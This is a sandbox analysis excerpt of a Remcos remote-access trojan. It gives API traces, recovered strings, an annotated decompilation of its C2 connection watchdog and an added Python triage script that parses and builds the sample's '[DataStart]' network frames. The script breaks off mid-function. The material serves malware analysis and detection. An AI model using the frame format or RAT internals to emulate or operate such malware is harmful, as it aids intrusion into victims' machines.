                                  control_flow_graph 686 40221e-40223b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z 687 40223e-402252 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 686->687 688 402254-402289 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40309e ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 687->688 689 40228b-402291 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z 687->689 690 402297-4022b3 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 4023f0 688->690 689->690 695 4023e0-4023ed ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 690->695 696 4022b9-4022ca ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ 690->696 697 4022d0-4022e4 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 696->697 698 4023d2-4023dd ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ 696->698 699 4022f2-402342 ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 697->699 700 4022e6-4022ec ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z 697->700 698->695 701 402344-40235a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z 699->701 702 40235c-402392 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 699->702 700->699 703 402398-4023cb ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ 701->703 702->703 703->695 705 4023cd 703->705 705->687
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 00402291
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6DF55DF0), ref: 00402302
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00402363
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040236D
                                  • CreateThread.KERNELBASE ref: 0040237E
                                  • WaitForSingleObject.KERNEL32(000003C4,000000FF), ref: 00402389
                                  • FindCloseChangeNotification.KERNELBASE(000003C4), ref: 00402392
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0040D2B5,6DF55DF0), ref: 004023A7
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023B1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023BA
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023C3
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023D5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023E3
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??4?$basic_string@V01@$??1?$basic_string@$?length@?$basic_string@?substr@?$basic_string@V12@$??0?$basic_string@??9std@@CreateD@2@@0@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?size@?$basic_string@ChangeCloseD@1@@EventFindNotificationObjectSingleThreadWait
                                  • String ID:
                                  • API String ID: 4193475032-0
                                  • Opcode ID: 44daeea15bb855e80108764f54982e8e04786625b5849f173a8cb93a7b3b47fc
                                  • Instruction ID: 9121e1d36d2ed1e5780a03bc3f6ba97c1b97061ac4fd9a6be39e0f6b7c1c719d
                                  • Opcode Fuzzy Hash: 44daeea15bb855e80108764f54982e8e04786625b5849f173a8cb93a7b3b47fc
                                  • Instruction Fuzzy Hash: 0451FD7250060EEFCB049FA0DD88CEEBB78FF84355B00806AF916A71A0DB745985CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                  • send.WS2_32(?,00000000), ref: 004024BB
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024C7
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024D1
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024EB
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024F5
                                  • send.WS2_32(?,00000000), ref: 004024FF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402509
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?length@?$basic_string@$??1?$basic_string@$?data@?$basic_string@A?$basic_string@send$??0?$basic_string@?c_str@?$basic_string@?empty@?$basic_string@D@1@@V01@V01@@Y?$basic_string@
                                  • String ID: [DataStart]
                                  • API String ID: 1403384299-3852763199
                                  • Opcode ID: 60551aed7677e7da4961a2a4342efdfb0fbb19cd34e67c04f744ba626c38ac59
                                  • Instruction ID: 4f95a53d81068631c3648da1c5498cf22458e2818172e99049c3d90a1b667ab5
                                  • Opcode Fuzzy Hash: 60551aed7677e7da4961a2a4342efdfb0fbb19cd34e67c04f744ba626c38ac59
                                  • Instruction Fuzzy Hash: 7621EA72500509EBCB05DF90DD599EE7778EB98342F108176E907A61E0DB705E44CFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(override,00000000), ref: 00409D63
                                    • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                    • Part of subcall function 0040B4C8: RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                    • Part of subcall function 0040B4C8: RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409D96
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409DB3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409DC6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.1 Pro,?), ref: 00409DDC
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409DE5
                                  • Sleep.KERNELBASE(00000BB8), ref: 00409DFA
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409E11
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409E2E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409E41
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.1 Pro,?), ref: 00409E57
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409E60
                                  • exit.MSVCRT ref: 00409E77
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@D@1@@V01@@$CloseOpenQuerySleepValueexit
                                  • String ID: 2.7.1 Pro$override$pth_unenc
                                  • API String ID: 3602623569-2954047980
                                  • Opcode ID: 66a132f25811430172b3037b5f7f4ac2c14d205858bba7e1f82af523167656d2
                                  • Instruction ID: 2889bc0b5ca8399aadfd957be20fb2b9bea035d2a19627ad42be5e9aadac3fca
                                  • Opcode Fuzzy Hash: 66a132f25811430172b3037b5f7f4ac2c14d205858bba7e1f82af523167656d2
                                  • Instruction Fuzzy Hash: 2E31B772A50604BBD70477E59C4AEFE776DEF84740F44002AF911971D1DFB8498187AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,6DF55DF0), ref: 00412A90
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A9A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AA3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$?length@?$basic_string@V12@$??4?$basic_string@?substr@?$basic_string@V01@V01@@$??0?$basic_string@?find@?$basic_string@D@1@@
                                  • String ID:
                                  • API String ID: 3435050692-0
                                  • Opcode ID: cf897032fafc8a7a18bc323011148a7a1d4392e457d1882d7af56b3e3f1ca591
                                  • Instruction ID: d00c3f8f62f9657134ffe5fc931faad8ab4b4020c85508924df81fb6bcd52547
                                  • Opcode Fuzzy Hash: cf897032fafc8a7a18bc323011148a7a1d4392e457d1882d7af56b3e3f1ca591
                                  • Instruction Fuzzy Hash: F631BB7250050EEBCB04EFA0E959CDE7778EF94745B108066F812E7160EB74AB49CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 44%
                                  			// Connection watchdog. __ecx is the C2 connection object; the field
                                  			// roles below are read off this decompilation, not from symbols:
                                  			//   +0x39  byte, set elsewhere once a reply has arrived
                                  			//   +0x3c  timeout in seconds (<= 0 skips the polling loop)
                                  			//   +0x40  seconds waited so far
                                  			//   +0x38  byte flag, cleared together with +0x39 on return
                                  			// _t21 is the decompiler's name for eax; its value is incidental.
                                  			E004027B1(void* __ecx) {
                                  				char _v5;
                                  				struct _SYSTEMTIME _v24;
                                  				char _v40;
                                  				void* _v56;
                                  				char* _t29;
                                  				char* _t30;
                                  				void* _t38;
                                  				intOrPtr _t46;
                                  
                                  				_t38 = __ecx;
                                  				 *((intOrPtr*)(__ecx + 0x40)) = 0;                    // reset elapsed-seconds counter
                                  				if( *((intOrPtr*)(__ecx + 0x3c)) <= 0) {
                                  					L3:
                                  					if( *((intOrPtr*)(_t38 + 0x39)) == 0) {           // timeout elapsed with no reply
                                  						_t46 =  *0x41bcac; // 0x0 in the dumped image, so the log line is skipped in this run
                                  						if(_t46 != 0) {
                                  							GetLocalTime( &_v24);
                                  							// Builds the "%02i:%02i:%02i:%03i [WARNING] " timestamp prefix, appends
                                  							// "Timeout expired, resetting connection.\n" (operator+ thunk L00414170)
                                  							// and prints it. The decompiler has folded the formatting call into the
                                  							// std::string constructor's argument list.
                                  							_t29 =  &_v5;
                                  							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [WARNING] ", _t29, "Timeout expired, resetting connection.\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff);
                                  							_t30 =  &_v40;
                                  							L00414170();
                                  							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t30, _t29);
                                  							_t21 = printf(_t30);
                                  							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						}
                                  						E004020F4(_t21, _t38);                            // the connection reset announced by the log message (body not shown here)
                                  					}
                                  					L7:
                                  					 *((char*)(_t38 + 0x38)) = 0;
                                  					 *((char*)(_t38 + 0x39)) = 0;
                                  					return 0;
                                  				}
                                  				// Poll once per second until a reply is flagged or +0x3c seconds have passed.
                                  				while( *((intOrPtr*)(_t38 + 0x39)) == 0) {
                                  					Sleep(0x3e8); // executed; 1000 ms
                                  					 *(_t38 + 0x40) =  *(_t38 + 0x40) + 1;
                                  					_t21 =  *(_t38 + 0x40);
                                  					if( *(_t38 + 0x40) <  *((intOrPtr*)(_t38 + 0x3c))) {
                                  						continue;
                                  					}
                                  					goto L3;
                                  				}
                                  				goto L7;
                                  			}
                                  Instruction addresses for the statements above, in order (0x00000000: a statement with no address of its own): 0x004027b9 0x004027c0 0x004027c3 0x004027e4 0x004027e7 0x004027e9 0x004027ef 0x004027f5 0x00402812 0x00402820 0x00402827 0x0040282b 0x00402835 0x0040283c 0x00402848 0x00402851 0x00402851 0x00402859 0x00402859 0x0040285e 0x0040285e 0x00402861 0x00402869 0x00402869 0x004027c5 0x004027d3 0x004027d9 0x004027dc 0x004027e2 0x00000000 0x00000000 0x00000000 0x004027e2 0x00000000

                                  APIs
                                  • Sleep.KERNELBASE(000003E8), ref: 004027D3
                                  • GetLocalTime.KERNEL32(?), ref: 004027F5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [WARNING] ,?,Timeout expired, resetting connection.,?,?,?,?), ref: 00402820
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040282B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00402835
                                  • printf.MSVCRT ref: 0040283C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402848
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402851
                                  Strings
                                  • %02i:%02i:%02i:%03i [WARNING] , xrefs: 0040281B
                                  • Timeout expired, resetting connection., xrefs: 00402815
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalSleepTimeV10@V?$basic_string@printf
                                  • String ID: %02i:%02i:%02i:%03i [WARNING] $Timeout expired, resetting connection.
                                  • API String ID: 2756237499-4159561219
                                  • Opcode ID: 6c118525b0c60a139ccd7d472cd10157555a95a5b55e4d0c4663a8155b7c7e9e
                                  • Instruction ID: eb574a52e8b17308bab00ba60a15c3ae4eff644db24cd51b069feea48370dafb
                                  • Opcode Fuzzy Hash: 6c118525b0c60a139ccd7d472cd10157555a95a5b55e4d0c4663a8155b7c7e9e
                                  • Instruction Fuzzy Hash: 95119372900758EFCB11EBA4D9898EFB7B9BB48301740447FFA42E3581E6B5A944C768
                                  Uniqueness

                                  Uniqueness Score: -1.00%
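                                  Added example (not code from this report, from Joe Sandbox or from the sample): a small triage script built from two of the routines above. The send routine whose API trace begins at 0x40244A constructs a std::string of 0x13 bytes from the "[DataStart]" literal, writes into it at offsets 0x0B and 0x0F (the two operator[] calls), appends the outgoing data with operator+= and hands the buffer to send(); parse_datastart_frame() carves a buffer laid out that way, and build_datastart_frame() produces one for testing. scan_markers() searches a memory dump or a carved TCP payload for the literals the report recovered from this image ("[DataStart]", "2.7.1 Pro", "pth_unenc", "Timeout expired, resetting connection.", "%02i:%02i:%02i:%03i [WARNING] "). Assumptions, marked in the code: the two header fields are read as little-endian DWORDs and their meaning is not asserted, because the trace only shows that those offsets are written. All sample input is constructed.

```python
"""Triage helpers derived from the Joe Sandbox decompilation of the
unpacked Remcos image.  Added example, not the report's or the sample's code.
"""
import struct
from typing import Optional

DATASTART_MAGIC = b"[DataStart]"   # 11-byte literal from the string table
HEADER_LEN = 0x13                  # length passed to the std::string ctor
FIELD_A_OFF = 0x0B                 # first operator[] write
FIELD_B_OFF = 0x0F                 # second operator[] write

# Narrow-string literals quoted in the report's "Strings" sections.
MARKERS = [
    b"[DataStart]",
    b"2.7.1 Pro",
    b"pth_unenc",
    b"Timeout expired, resetting connection.",
    b"%02i:%02i:%02i:%03i [WARNING] ",
]


def build_datastart_frame(field_a: int, field_b: int, payload: bytes) -> bytes:
    """Lay out a buffer the way the trace shows the sample doing it:
    19-byte header from the magic, two DWORDs patched in, payload appended.
    Little-endian DWORDs are an assumption (x86 dword stores)."""
    header = bytearray(DATASTART_MAGIC.ljust(HEADER_LEN, b"\x00"))
    struct.pack_into("<I", header, FIELD_A_OFF, field_a)
    struct.pack_into("<I", header, FIELD_B_OFF, field_b)
    return bytes(header) + payload


def parse_datastart_frame(buf: bytes) -> Optional[dict]:
    """Return header fields and body of a "[DataStart]" frame, or None when
    buf does not start with the magic or is shorter than the header."""
    if len(buf) < HEADER_LEN or not buf.startswith(DATASTART_MAGIC):
        return None
    field_a, = struct.unpack_from("<I", buf, FIELD_A_OFF)
    field_b, = struct.unpack_from("<I", buf, FIELD_B_OFF)
    body = buf[HEADER_LEN:]
    return {
        "field_0b": field_a,
        "field_0f": field_b,
        "body": body,
        # Reported for the analyst only: the trace does not say what the
        # field at 0x0B holds, so this is a hint, not a validity check.
        "field_0b_is_body_len": field_a == len(body),
    }


def scan_markers(blob: bytes) -> list:
    """All (offset, marker) hits for the report's literals, sorted by offset."""
    hits = []
    for marker in MARKERS:
        start = 0
        while True:
            idx = blob.find(marker, start)
            if idx < 0:
                break
            hits.append((idx, marker.decode("ascii")))
            start = idx + 1
    return sorted(hits)


def triage(blob: bytes) -> dict:
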